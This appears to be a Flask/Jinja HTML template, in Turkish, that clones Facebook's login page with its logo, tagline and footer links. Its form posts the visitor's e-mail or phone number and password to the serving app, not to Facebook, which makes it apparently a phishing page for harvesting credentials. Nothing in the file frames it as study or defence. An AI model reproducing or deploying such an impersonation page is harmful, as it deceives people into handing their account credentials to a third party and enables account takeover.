<!DOCTYPE html>
<html>

<head>
    <meta charset="UTF-8">
    <title>Facebook Oturum</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/styles.css') }}">
    <link rel="shortcut icon" href="{{ url_for('static', filename='images/fb.ico') }}" type="image/x-icon">
</head>

<body>
    <main>
        <div class="main">
        <div class="heading-section">
            <img src="{{ url_for('static', filename='images/logo.png') }}" class="logo-img">
            <div class="a-ri8"><span>Facebook hayatınızdaki insanlarla bağlantı kurmanıza ve paylaşımda bulunmanıza yardımcı olur.</span></div>
        </div>

        <div class="form">
            <form class="a-form" method="POST">
                <input type="email" id="Email" class="a-email" name="login" placeholder="E-posta veya Telefon Numarası"
                    autofocus="autofocus" required />
                <input type="password" id="Password" class="a-pss" name="password" placeholder="Şifre"
                    autofocus="autofocus" />
                <input type="submit" class="a-sub" value="Oturum Aç" />
                <a href="" class="a-link">Şifrenizi mi unuttunuz?</a>
                <hr class="a-hr">
                <input type="submit " value="Yeni Hesap Oluştur" class="a-but" />
            </form>
            <div class="create-page">
                <a href="" class="a-href">Sayfa Oluştur</a></b> Bir ünlü, marka veya işletme için.
            </div>
            </div>
        </div>

    </main>
    <div class="footer">
        <div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
            <ul>
                <li>İngilizce (UK)</li>
                <li><a href="">Hintçe</a></li>
                <li><a href="">Almanca</a></li>
                <li><a href="">Fransızca</a></li>
                <li><a href="">Arapça</a></li>
                <li><a href="">Malayca</a></li>
                <li><a href="">Fransızca</a> </li>
                <li><a href="" class="_sv4">Çince</a> </li>
                <li><a href="" class="_sv4">Korece</a></li>
                <li><a href="" class="_sv4">İspanyolca</a></li>
                <li><a href="" class="_sv4">italyanca</a></li>
                <li><a href="" role="button"><i class="img sp_ZtNaJVka3YU_2x sx_c13ad6"></i></a> </li>
            </ul>
            <div id="line"></div>
            <div>
                <ul>
                    <li><a href="">Üye Ol</a></li>
                    <li><a href="" >Oturum Aç</a></li>
                    <li><a href="">Messenger</a></li>
                    <li><a href="">Facebook Lite</a> </li>
                    <li><a href=""> izle </a> </li>
                    <li><a href="">insanlar</a> </li>
                    <li><a href="">Sayfalar</a></li>
                    <li><a  href="">Sayfa Katagorileri</a></li>
                    <li><a href="">Yerler</a></li>
                    <li><a href="">Oyunlar</a></li>
                    <li><a href="">Konum</a></li>
                    <li><a href="">Marketplace</a></li>
                    <li><a href="">Facebook Ödeme</a></li>
                    <li><a href="">Gruplar</a></li>
                    <li><a href="">iş</a></li>
                    <li><a href="">Vr</a></li>
                    <li><a href="">Portal</a></li>
                    <li><a href="">Instagram</a></li>
                    <li><a href="">Yerel</a></li>
                    <li><a href="">Bagıs</a></li>
                    <li><a href="">Servis</a></li>
                    <li><a href="">Oylama Bilgi Merkezi</a></li>
                    <li><a href="">Hakkında</a></li>
                    <li><a href="">Reklam</a></li>
                    <li><a href="">Sayfa Olustur</a></li>
                    <li><a href="">Geliştirici</a></li>
                    <li><a href="">Kariyer</a></li>
                    <li><a href="">Gizlilik</a></li>
                    <li><a href="">Çerezler</a></li>
                    <li><a href="">Reklam Secenekleri<i class="img sp_ZtNaJVka3YU_2x sx_d75518"></i></a></li>
                    <li><a href="">Sartlar</a></li>
                    <li><a href="">Yardım</a></li>
                    <li><a href="">Ayarlar</a></li>
                    <li><a href="">Etkinlik Günlüğü</a></li>
                </ul>
            </div>
            <div class="telif hakkı">
                <div><span> Facebook © 2021</span>
                </div>
            </div>
        </div>
    </div>
            <div class="m-footer">
                <div class="main-c">
                    <div class="list-1"><span >ingilizce (UK)</span>
                        <div><span><a href="">Japonca</a></span></div>
                        <div><span><a href="">Arapca</a></span></div>
                        <div><span><a href="">Korece</a></span></div>
                    </div>
                    <div class="list-2">
                        <div><span><a href="">Hintçe</a></span></div>
                        <div class=""><span><a href="">ispanyolca</a></span>
                        </div>
                        <div><span><a href="">italyanca</a></span></div>
                        <a>
                            <div><i class="img sp_vuppHZ0nD_0_3x sx_222020"></i>
                            </div>
                        </a>
                    </div>
                </div>
                <div class="main-links">
                    <span>Hakkında </span>.
                    <span> Yardım </span>.
                    <span> Daha Fazla </span>
                </div>
                <div class="fb">Facebook Inc.</div>
            </div>
</body>

</html>